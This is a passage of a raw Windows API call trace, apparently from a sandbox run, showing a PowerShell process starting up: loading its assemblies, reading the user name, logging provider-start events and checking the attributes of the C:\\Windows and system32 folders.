NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.107] GetLastError () returned 0xcb [0090.107] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.108] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3668e2c*="Function", lpRawData=0x3668ce8) returned 1 [0090.108] GetLastError () returned 0x0 [0090.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.108] GetLastError () returned 0xcb [0090.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.110] GetLastError () returned 0xcb [0090.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.110] GetLastError () returned 0xcb [0090.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.110] GetLastError () returned 0xcb [0090.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.110] GetLastError () returned 0xcb [0090.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e088, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.122] GetLastError () returned 0xcb [0090.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.122] GetLastError () returned 0xcb [0090.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e038, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.122] GetLastError () returned 0xcb [0090.122] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.123] GetLastError () returned 0xcb [0090.123] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.123] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3681ee8*="Registry", lpRawData=0x3681da4) returned 1 [0090.123] GetLastError () returned 0x0 [0090.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.124] GetLastError () returned 0x0 [0090.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.124] GetLastError () returned 0x0 [0090.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.124] GetLastError () returned 0x0 [0090.125] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.125] GetLastError () returned 0x0 [0090.125] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.125] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3685cd0*="Variable", lpRawData=0x3685b8c) returned 1 [0090.125] GetLastError () returned 0x0 [0090.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.126] GetLastError () returned 0xcb [0090.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.128] GetLastError () returned 0xcb [0090.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e074, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.128] GetLastError () returned 0xcb [0090.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.129] GetLastError () returned 0xcb [0090.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.129] GetLastError () returned 0xcb [0090.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13e024, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.129] GetLastError () returned 0xcb [0090.144] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e674) returned 0x1 [0090.144] GetLastError () returned 0x3 [0090.144] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e67c) returned 1 [0090.144] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3693a9c*="Certificate", lpRawData=0x3693958) returned 1 [0090.144] GetLastError () returned 0x0 [0090.146] GetLogicalDrives () returned 0x4 [0090.146] GetLastError () returned 0xcb [0090.146] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.146] GetLastError () returned 0xcb [0090.146] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.146] GetLastError () returned 0xcb [0090.150] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3953b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.150] GetLastError () returned 0xcb [0090.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.154] GetLastError () returned 0xcb [0090.154] SetErrorMode (uMode=0x1) returned 0x1 [0090.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x369a9bc | out: lpFileInformation=0x369a9bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.154] GetLastError () returned 0xcb [0090.154] SetErrorMode (uMode=0x1) returned 0x1 [0090.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e03c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.154] GetLastError () returned 0xcb [0090.154] SetErrorMode (uMode=0x1) returned 0x1 [0090.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x369ab50 | out: lpFileInformation=0x369ab50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.154] GetLastError () returned 0xcb [0090.154] SetErrorMode (uMode=0x1) returned 0x1 [0090.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.155] GetLastError () returned 0xcb [0090.155] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.155] GetLastError () returned 0xcb [0090.155] SetErrorMode (uMode=0x1) returned 0x1 [0090.155] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.155] GetLastError () returned 0xcb [0090.155] SetErrorMode (uMode=0x1) returned 0x1 [0090.155] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.155] GetLastError () returned 0xcb [0090.155] SetErrorMode (uMode=0x1) returned 0x1 [0090.155] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0090.155] GetLastError () returned 0xcb [0090.155] SetErrorMode (uMode=0x1) returned 0x1 [0090.155] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x13e114, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.155] GetLastError () returned 0xcb [0090.155] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0090.155] GetLastError () returned 0xcb [0090.155] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x89a56640, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x89a56640, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x89a56640, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x89a56640, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.156] GetLastError () returned 0xcb [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x13e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.156] GetLastError () returned 0xcb [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x13e580 | out: lpFileInformation=0x13e580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.156] GetLastError () returned 0xcb [0090.156] SetErrorMode (uMode=0x1) returned 0x1 [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e114, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.156] GetLastError () returned 0xcb [0090.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x13e0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.156] GetLastError () returned 0xcb [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x13e58c | out: lpFileInformation=0x13e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x89a56640, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x89a56640, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x13e58c | out: lpFileInformation=0x13e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x89a56640, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x89a56640, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x13e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.157] GetLastError () returned 0xcb [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x13e0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0090.157] GetLastError () returned 0xcb [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x13e58c | out: lpFileInformation=0x13e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x13e58c | out: lpFileInformation=0x13e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.157] GetLastError () returned 0xcb [0090.157] SetErrorMode (uMode=0x1) returned 0x1 [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.157] GetLastError () returned 0xcb [0090.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x13e0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.157] GetLastError () returned 0xcb [0090.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x13e1dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0090.158] GetLastError () returned 0xcb [0090.158] SetErrorMode (uMode=0x1) returned 0x1 [0090.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x36a28f8 | out: lpFileInformation=0x36a28f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xbd323dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd323dc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0090.158] GetLastError () returned 0xcb [0090.158] SetErrorMode (uMode=0x1) returned 0x1 [0090.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.159] GetLastError () returned 0xcb [0090.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.159] GetLastError () returned 0xcb [0090.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.159] GetLastError () returned 0xcb [0090.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.159] GetLastError () returned 0xcb [0090.181] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x37b268, nSize=0x13e778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x13e778) returned 0x1 [0090.181] GetLastError () returned 0xcb [0090.181] GetUserNameW (in: lpBuffer=0x3953b0, pcbBuffer=0x13e780 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x13e780) returned 1 [0090.182] ReportEventW (hEventLog=0x5190004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f7a87c*="Available", lpRawData=0x2f7a738) returned 1 [0090.184] GetLastError () returned 0x0 [0090.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.185] GetLastError () returned 0xcb [0090.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.186] GetLastError () returned 0xcb [0090.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 